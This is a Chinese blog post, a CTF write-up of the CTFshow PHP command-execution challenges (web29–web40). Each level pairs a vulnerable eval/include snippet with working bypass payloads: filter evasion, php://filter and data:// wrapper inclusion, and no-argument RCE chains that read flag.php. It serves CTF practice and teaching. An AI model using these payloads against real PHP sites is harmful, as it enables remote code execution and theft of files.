CTFshow_命令执行

最新推荐文章于 2022-11-28 10:39:03 发布
最新推荐文章于 2022-11-28 10:39:03 发布
阅读量1.1k 收藏 5
点赞数 2
分类专栏: Web安全-CTFShow Web 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/121277420
版权

文章目录

web29

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了flag
get方式传参:
?c=system(ls);
在这里插入图片描述
发现flag.php,直接:?c=system('cat f*');
但是这里会返回一个空页面,因为PHP是服务器端解释的语言,在浏览网页的时候服务器会对php文件进行解释并执行,最终生成相应的HTML代码并返回给浏览器,所以网页是显示不出PHP代码。没关系,我们查看源代码就行。
在这里插入图片描述

也可以:
?c=system("cp fla?.php 1.txt");
然后再去访问1.txt就行
在这里插入图片描述
提示是:

echo `nl fl''ag.php`;

web30

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤掉了flag,system,php

?c=echo `cat fla\g.p\hp`;

web31

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

重点是过滤了点、单引号、空格
空格我们使用%09代替,

?c=echo%09`tac%09f*`;

在这里插入图片描述

web32

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

这次又过滤了分号,反引号,echo,和左括号
要用到php伪协议了,
因为只对c进行匹配,那么我们可以逃逸get[]里面的东西,因为不能有;所以用?>代替。

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述
将结果拿去base64解码即可在这里插入图片描述

web33-35

?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web36

在这里插入图片描述
这次把数字过滤了

payload依旧可以用:

?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述

web37

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

include (或 require)语句会获取指定文件中存在的所有文本/代码/标记,并复制到使用 include 语句的文件中。
要使用php伪协议中的data://,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行

payload1:

?c=data: text/plain,<?php system("cat f*")?>

payload2:

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
//后面为base64编码<?php system('cat flag.php');?>

查看页面源代码可以看到flag

web38

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

过滤了php,file,37的payload2还可以用
payload:

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

在这里插入图片描述

web39

hint:
data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用

?c=data: text/plain,<?php system("cat f*")?>

在这里插入图片描述

web40

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

过滤的是中文的括号不是英文的、过滤了单双引号、过滤了数字;因为大致看看,能用的是英文的括号和字母还有下划线。而命令执行大多数需要单双引号来传参数,所以就想到了无参RCE

函数:print_r(scandir(’.’))可以用来查看当前目录所有文件名,由于小数点被过滤了,
接下来需要将括号中的.替代掉
localeconv()函数返回一包含本地数字及货币格式信息的数组
可利用localeconv()函数返回数组中的第一个小数点代替读取目录函数print_r(scandir(’.’))中的参数.

current(localeconv())就相当于.

?c=print_r(scandir(pos(localeconv())));

在这里插入图片描述
可以得到flag.php位于数组的第三个值里,也就是倒数第二个,我们可以通过array_reverse()函数以相反的元素顺序返回数组,在用next()函数读取下一个元素,最后通过highlight_file()函数读取到flag.php

payload1:

?c=highlight_file(next(array_reverse(scandir(current(localeconv())))));

在这里插入图片描述

总结:

localeconv():返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)

current() :返回数组中的当前元素的值;默认取第一个值


pos()current() 的别名

reset()array 的内部指针倒回到第一个单元并返回第一个数组单元的值。

array_reverse():数组逆序

(如果不是数组的最后一个或者倒数第二个呢?我们可以使用array_rand(array_flip())array_flip()是交换数组的键和值,array_rand()是随机返回一个数组)

scandir():列出指定路径中的文件和目录

next():函数将内部指针向前移动一位即指向数组中的下一个元素,并输出这个元素。

highlight_file() 函数对文件进行 PHP 语法高亮显示。
语法通过使用 HTML 标签进行高亮。
注释:当使用该函数时,整个文件都将被显示,包括密码和其他敏感信息!
Stray.io
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
web buuctf [MRCTF2020]Ezpop1
weixin_44214568的博客
04-07 545
知识点:1.魔法函数 2.文件包含漏洞 1.开题,php代码审计 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Cr...
flag就在flag.php,flag就在flag.php
weixin_39610807的博客
03-11 563
Web1题目地址1.访问题目存在一个登录界面 2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示 3.访问flag.php,试试可不可以得到flag 提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的4.抓包 发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密之后的 在登录成功跳转的那个页面还有一个...
一道简单的SSRF
m0_56059226的博客
05-15 679
看到了一道简单的ssrf,由于说有非预期但是忘了这个知识点,所以还是记录一下 题目进去后就是一串代码 <?php highlight_file(__FILE__); //find something in flag1.php $d = $_GET['d']; $file = $_GET['ctf']; if (filter_var($d, FILTER_VALIDATE_URL)) { $r = parse_url($d); if (isset($file)) {
ISCTF新生赛(引用传递&简单社工)
weixin_63231007的博客
11-28 771
而cat类中的 dog函数会对变量 $this->a 赋值字符串,我们可以利用这个$this->b = $this->c来给 $this->a 赋值 new mouse类,具体方法就是让$this->b = &$this->a,引用传递,之后die($this->a);根据 小港(南) 上北下南,肯定是红线,然后我们 去高雄捷运官网,根据唯一已知的末班车时刻表信息区查一下对应的站点。搜着搜着好多不是,但是最后猛地看见一个特别熟悉的背景,这不就是图里背面的画吗?我们搜索一下巨蛋站的信息,再确认一下。
flag in flag.php,hgame2019解题记录
weixin_42531128的博客
03-17 879
“想与你赏流河山川,踏青山风光无限,樵采打渔为生,尽是梦里的人间。”菜鸡来写wp啦…Level - Week 1WEB谁吃了我的flagfirst根据题目描述,vim、未正常关机…估计也就是考察vimbak的知识,意外退出时,并不会覆盖旧的交换文件,而是会重新生成新的交换文件。而原来的文件中并不会有这次的修改,文件内容还是和打开时一样。第一次产生的交换文件名为“.file.txt.swp”;再次意...
ctfshow-php特性
YkingH的博客
01-26 5639
Web专项练习—ctfshow-php特性 php绕过方法总结 小数绕过 进制绕过 ==、 = ==绕过 %20空格绕过 %0a换行绕过 回车\空格+八进制绕过 相对路径绕过 php伪协议读取文件 数组md5值为0 弱类型匹配 函数写???? 运算优先级漏洞 反射类绕过 call_user_func()绕过 sha1()函数绕过 变量覆盖 sha1弱比较 md5弱比较 ereg()截断漏洞 php内置类 FilesystemIterator 压缩过滤器绕过 空格代替url ‘_’ 绕过 gettex
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
隐写_Jphswin_ctfshow.rar
08-26
这是一个jphswin隐写工具哦! 喜欢的可以下载啦
php反序列化漏洞
weixin_43680269的博客
04-18 318
Web | 带你了解php反序列化漏洞 原创Web蝰蛇安全实验室3月23日 序列化与反序列化 序列化:把对象转换为字节序列,用于保存 反序列化:把字节序列恢复为对象的过程 转换成统一的格式便于传输 保留对象的状态以及相关的描述信息 序列化机制的核心作用就是对象状态的保存与重建 反序列化本身不是漏洞,但是反序列化的参数可...
GWHT
weixin_45689999的博客
06-06 703
1.wake_up <?php // flag is in flag.php highlight_file(__FILE__); class FILE { private $file = "fl4g.php"; public function __construct($file) { $this->file = $file; } function __destruct(){ echo highlight_file($th
PHP渗透测试题目笔记
Zeker62的博客
02-10 5333
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
1.30 刷题
Lumos427的博客
01-30 636
ctfshow web入门 命令执行 web37 //flag in flag.php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c); echo $flag; } }else{ highlight_file(__FILE__); } 这里用了include文件包含,代码不能直接执行
fileinclude (攻防世界web)
qq_53099119的博客
10-01 1397
接下来构造payload,使用filter伪协议来读取flag.php的源码: payload: language=php://filter/convert.base64-encode/resource=/var/www/html/flag 注意,由于在源码分析中,对lan最后拼接了“.php”,因此在payload中flag后不用加。 执行后即可获得flag的base64编码。
四个实例递进理解php反序列化漏洞
烟敛寒林的博客
05-14 1195
0x00 D0g3 为了让大家进入状态,来一道简单的反序列化小题。 题目入口:http://120.79.33.253:9001 页面源码 <?php error_reporting(0); include "flag.php"; $KEY = "D0g3!!!"; $str = $_GET['str']; if (unserialize($str) === "$KEY") { ...
windows用户密码破解
热门推荐
qq_45927819的博客
03-03 1万+
文章目录一、hash简介二、Windows系统下的hash密码格式三、windows hash抓取1、通过SAM文件+mimikatz读取密码2、mimikatz3、procdump64+mimikatz4、QuarksPwDump5、wce四、利用Hash远程登录系统 一、hash简介 Hash主要用于信息安全领域中加密算法,渗透测试中获取目标系统的明文或Hash往往是整个渗透测试过程中重要的一环。在Windows系统中本机用户的密码Hash是放在本地的SAM文件里面,域内用户的密码Hash是存在域控的N
ctfshow web入门命令执行
最新发布
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过技巧,如分号、竖线、双与号等。这些技巧可以用来绕过应用程序对输入参数的限制,从而注入恶意的命令。 引用中提到的payload,其中使用了一个通用的命令执行函数"show_source"来显示指定文件的源代码。这个payload可以用来尝试执行"flag.php"文件的源代码。但前提是要知道有一个名为"flag.php"的文件存在。 另外,引用中提供了另一种payload的示例,其中使用了array_reverse和scandir函数来获取文件目录并显示指定文件的源代码。同样,也可以直接使用show_source('flag.php')来显示"flag.php"文件的源代码。 需要注意的是,命令执行漏洞是非常危险的,因为它可以导致恶意用户执行任意的系统命令。为了保护Web应用程序免受此类攻击,开发人员应该对用户的输入进行严格的验证和过滤,并使用安全的编程实践来防止命令注入漏洞的发生。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ctfshow web入门之命令执行](https://blog.csdn.net/uuzfumo/article/details/128357863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTFShow Web入门 命令执行](https://blog.csdn.net/qq_19533763/article/details/123910732)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值